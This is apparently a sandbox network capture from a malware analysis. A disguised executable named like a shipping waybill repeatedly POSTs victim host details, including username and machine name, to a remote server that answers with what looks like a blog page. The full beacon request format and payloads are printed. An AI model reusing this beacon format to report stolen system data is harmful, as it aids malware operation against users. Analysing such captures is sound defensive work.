Apr 25, 2024 09:42:18.466468096 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:17 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:18.466639042 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 25, 2024 09:42:18.466790915 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 25, 2024 09:42:18.466859102 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 25, 2024 09:42:18.466968060 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:18.476464033 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:18.477210045 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:18.477312088 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:18.477408886 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:18.477421999 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49766	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:18.729352951 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:18.857623100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:19.676090956 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:18 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:19.676172972 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:19.676260948 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:19.686048985 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:19.686269045 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:19.686423063 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:19.686562061 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:19.686760902 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:19.686810970 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:19.686980963 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49767	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:19.955290079 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:20.083064079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:20.902578115 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:20 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:20.902595043 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:20.902717113 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:20.911787987 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:20.912470102 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:20.913153887 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:20.913319111 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:20.913477898 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:20.913505077 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:20.913516998 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49768	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:21.173515081 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:21.304595947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:22.124806881 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:21 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:22.124870062 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:22.124936104 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:22.133994102 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:22.134406090 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:22.134527922 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:22.134689093 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:22.134879112 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:22.134891033 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:22.134922028 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49769	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:22.438277960 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:22.569266081 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:23.512512922 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:22 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:23.512530088 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:23.512540102 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:23.514379025 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:23.514713049 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:23.519587994 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:23.519922018 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:23.520001888 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:23.520030975 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:23.520215034 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49770	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:23.788777113 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:23.920108080 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:24.977608919 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:23 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:24.977785110 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
